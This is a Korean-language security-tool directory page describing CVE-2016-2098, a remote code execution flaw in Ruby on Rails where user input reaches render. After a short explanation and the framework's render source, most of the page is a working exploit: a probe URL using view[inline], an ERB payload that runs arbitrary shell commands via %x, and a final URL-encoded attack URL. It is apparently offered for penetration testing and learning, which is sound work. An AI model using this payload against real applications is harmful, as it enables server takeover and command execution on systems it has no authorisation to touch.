Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2016-2098 — Ruby-on-Rails에서 사용자 제공 데이터에 render를 사용할 때 발생하는 원격 코드 실행 취약점 | Kitploit
도구/GitHubGitHub/j4k0m/cve-2016-2098
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Ruby-on-Rails에서 사용자 제공 데이터에 render를 사용할 때 발생하는 원격 코드 실행 취약점

저장소 보기
44년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2016-2098

Ruby-on-Rails에서 render를 사용자 제공 데이터에 사용할 때 발생하는 원격 코드 실행 취약점입니다.

설명:

이 문제는 사용자 제공 데이터에 render 메서드를 사용함으로써 발생합니다.

render 메서드는 일반적으로 템플릿에서 페이지를 렌더링하는 데 사용되지만, render 메서드는 개발자가 일반 텍스트(plaintext) 및 인라인 코드(inline)도 렌더링할 수 있도록 합니다.

render 함수:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

공격 예제:

대상 URL:

root@kitploit:~
http://example.com/?view=test

공격:

root@kitploit:~
http://example.com/?view[inline]=OK

소스 코드에 'OK'가 표시되면 웹 애플리케이션이 CVE-2016-2098에 취약한 것입니다.

원격 코드 실행

root@kitploit:~
<%= %x('[CMD]') %>

CMD를 실행하려는 명령어로 바꿀 수 있습니다.

root@kitploit:~
<%= %x('whoami') %>

URL 인코딩 후:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

최종:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

참고 자료:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
도구 다운로드